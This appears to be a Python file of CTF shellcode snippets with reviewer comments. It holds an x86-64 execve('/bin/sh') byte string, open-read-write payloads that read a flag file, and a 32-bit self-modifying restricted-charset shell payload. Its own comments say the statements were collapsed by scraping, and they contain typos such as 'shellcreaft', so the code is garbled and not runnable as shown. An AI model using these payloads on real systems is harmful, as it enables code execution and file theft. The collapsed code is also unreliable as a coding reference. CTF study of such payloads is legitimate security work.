# NOTE(review): these statements were scraped from a CTF write-up and collapsed
# onto single lines: several "lines" below hold more than one statement, and
# the inline assembly strings have lost their line breaks, so nothing here is
# runnable as shown. `asm`, `shellcraft`, `context` and `elf` are not defined
# or imported anywhere in view.
#
# Reviewer's reading of this literal: it begins with `push 0x3b` (6a 3b, the
# x86-64 execve number) and ends with `syscall` (0f 05); the ASCII bytes of
# "/bin/sh" (2f 62 69 6e 2f 73 68) sit in it in clear, which is exactly what
# signature-based scanners and YARA-style rules key on. It is written as a
# plain text `str` literal with no `b` prefix -- looks Python-2 era; confirm.
shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
# The two commented lines below are collapsed pwntools statements ("#pwntools"
# was the original comment); they build the same two payload families as the
# assembly further down and are kept only as the author's alternative.
#pwntoolscontext.arch = elf.archshellcode = asm(shellcreaft.sh())
#pwntoolsshellcode = ''shellcode += shellcraft.open('./flag')shellcode += shellcraft.read('eax','esp',0x100)shellcode += shellcraft.write(1,'esp',0x100)payload1 = asm(shellcode)
# x86-64 open-read-write ("orw") payload: pushes 0x67616c66 ("flag" in
# little-endian) as the path, then issues syscalls 2 (open), 0 (read into the
# stack) and 1 (write to fd 1). From a defender's side, a seccomp or sandbox
# policy that denies open/openat to untrusted code stops this whole pattern
# regardless of how the bytes are encoded; the mnemonics here are run together
# by the scrape and would not assemble as written.
shellcode = asm(''' push 0x67616c66 mov rdi,rsp xor esi,esi push 2 pop rax syscall mov rdi,rax mov rsi,rsp mov edx,0x100 xor eax,eax syscall mov edi,1 mov rsi,rsp push 1 pop rax syscall ''')
# Two statements collapsed into one by the scrape (the uncommented twin of the
# "#pwntools" line above).
context.arch = elf.archshellcode = asm(shellcreaft.sh())
# 32-bit payload written with a restricted instruction set (push/pop/xor with
# small immediates). It depends on the values of eax, ecx and edx at entry --
# presumably eax points at the payload buffer; verify against the challenge.
# The `xor byte ptr[ebx+0x35],al` / `[ebx+0x36]` pair (author's comment: "set
# int 0x80") rewrites two of the payload's own bytes at runtime so the syscall
# opcode is absent from the static bytes; that only works when the page holding
# the code is both writable and executable, so NX / W^X enforcement defeats it.
# The three pushes build "/bin///sh" on the stack (author's "push /bin/sh").
shellcode = asm(''' push eax pop ebx push edx pop eax dec eax xor al,0x46 xor byte ptr[ebx+0x35],al #set int 0x80 xor byte ptr[ebx+0x36],al push ecx pop eax xor al, 0x41 xor al, 0x40 push ecx pop eax xor al, 0x41 xor al, 0x40 push ecx pop eax xor al, 0x41 xor al, 0x40 push ecx # set al=0xb pop eax xor al, 0x41 xor al, 0x40 push edx # set ecx=0 pop ecx push 0x68 # push /bin/sh push 0x732f2f2f push 0x6e69622f push esp pop ebx ''')
# 32-bit (int 0x80) version of the same orw payload, kept commented out by the
# author; its embedded /* ... */ comments label the open/read/write steps.
#write by asmshellcode = """/*open(./flag)*/push 0x1010101xor dword ptr [esp], 0x1016660push 0x6c662f2emov eax,0x5mov ebx,espxor ecx,ecxint 0x80/*read(fd,buf,0x100)*/mov ebx,eaxmov ecx,espmov edx,0x30mov eax,0x3int 0x80/*write(1,buf,0x100)*/mov ebx,0x1mov eax,0x4int 0x80"""
# Duplicate of the commented pwntools orw line above.
#pwntoolsshellcode = ''shellcode += shellcraft.open('./flag')shellcode += shellcraft.read('eax','esp',0x100)shellcode += shellcraft.write(1,'esp',0x100)payload1 = asm(shellcode)